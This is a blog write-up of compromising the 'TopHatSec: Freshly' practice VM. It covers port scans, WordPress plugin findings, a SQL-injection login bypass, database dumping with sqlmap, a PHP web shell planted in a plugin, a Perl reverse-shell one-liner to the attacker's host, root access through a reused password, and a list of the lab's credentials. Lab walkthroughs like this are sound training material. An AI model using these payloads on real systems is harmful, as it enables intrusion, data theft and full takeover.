TopHatSec: Freshly – Write Up

Just freshly.

Nmap result

root@kali:~# nmap -sC -sV 192.168.56.103

Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-21 07:00 WIB
Nmap scan report for 192.168.56.103
Host is up (0.0016s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn’t have a title (text/html).
443/tcp  open  ssl/http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn’t have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05+00:00
|_Not valid after:  2025-02-14T03:30:05+00:00
|_ssl-date: ERROR: Script execution failed (use -d to debug)
8080/tcp open  http     Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn’t have a title (text/html).
MAC Address: 08:00:27:F2:73:82 (Cadmus Computer Systems)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.74 seconds

When I look at port 80 there only gif here.

tumblr_mdeo27ZZjB1r6pf3eo1_500

 

On port 8080 and 443.

 

Selection_181

Selection_180

But “Nice Find!…Proceed” link to directory “wordpress/”

Selection_162

WordPress have vulnerability at Cart66 Lite <= 1.5.3 plugins sql injection, ProPlayer 4.7.9.1 plugins sql injection and,  Google Analytics by Yoast 5.3.2 Cross-Site Scripting (XSS), I found this vulnerability by wpscan.

[!] Title: Cart66 Lite <= 1.5.3 – SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/7737
Reference: https://research.g0blin.co.uk/g0blin-00022/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9442
[i] Fixed in: 1.5.4

 

[!] Title: Google Analytics by Yoast 5.3.2 – Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7838
Reference: http://packetstormsecurity.com/files/130716/
Reference: http://osvdb.org/119334

 

[!] Title: ProPlayer 4.7.9.1 – SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/6912
Reference: http://osvdb.org/93564
Reference: http://www.exploit-db.com/exploits/25605/

But there are more interesting after I use nikto for scanning port 80

Nikto result

root@kali:~# nikto -h 192.168.56.103
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.56.103
+ Target Hostname: 192.168.56.103
+ Target Port: 80
+ Start Time: 2015-04-22 06:32:30 (GMT7)
—————————————————————————
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2f 0x50f4228b8016c
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ Uncommon header ‘x-webkit-csp’ found, with contents: default-src ‘self’ ;script-src ‘self’ ‘unsafe-inline’ ‘unsafe-eval’;style-src ‘self’ ‘unsafe-inline’;img-src ‘self’ data: *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ Uncommon header ‘x-ob_mode’ found, with contents: 0
+ Uncommon header ‘x-content-security-policy’ found, with contents: default-src ‘self’ ;options inline-script eval-script;img-src ‘self’ data: *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6744 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2015-04-22 06:33:48 (GMT7) (78 seconds)
—————————————————————————
+ 1 host(s) tested

 

Then look it up the login.php at port 80 there is login page with result “0” if false, and “1” if true, how to test the login page.

Selection_163 Login with user “admin” and password “admin”

 

 

Selection_164

And I try to bypass authentication with payload classic sql injection “any’ or 1=1;#” the result parameter user and password are injectable for sqlinjection.

 

Selection_165 Login with user “any’ or 1=1;#” and password anything.

 

 

Selection_166

 

Now exploits this vulnerability with sqlmap tools.

Selection_171

Selection_168

And I’m interested in the database wordpress8080, then dump this database.

Selection_169

Selection_170

 

 

Reverse shell

Login into wp-admin and edit one of the existing php code plugins.

My code

<html>
<form name=”cmd” action=”” method=”post”>
$ <input type=”text” name=”cmd”>
<input type=”submit” value=”submit” name=”submit”>
</form>
<?php
if (isset($_POST[‘submit’])){
$target = $_REQUEST[ ‘cmd’ ];
echo shell_exec( $target);
}
?>
</html>

 

Selection_172

Selection_173Make reverse shell with perl.

perl -e ‘use Socket;$i=”192.168.56.102″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

 

Selection_174

Selection_175Selection_176

There is a mistake for permission /etc/shadow is 755 (-rwxr-xr-x).

Selection_177

But I don’t need to crack this shadow for get root access, I just try to find root password for mysql and also try to run “su root” command with root mysql password.

Selection_178

Move to interactive shell with python and run “su root” command.

Selection_179

 Appendix

WordPress password

admin : SuperSecretPassword

Login.php password

candyshop : password

Sir : PopRocks

MySql password

root : SuperSecretPassword

User password

root : SuperSecretPassword

user : SuperSecretPassword

candycane : password

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s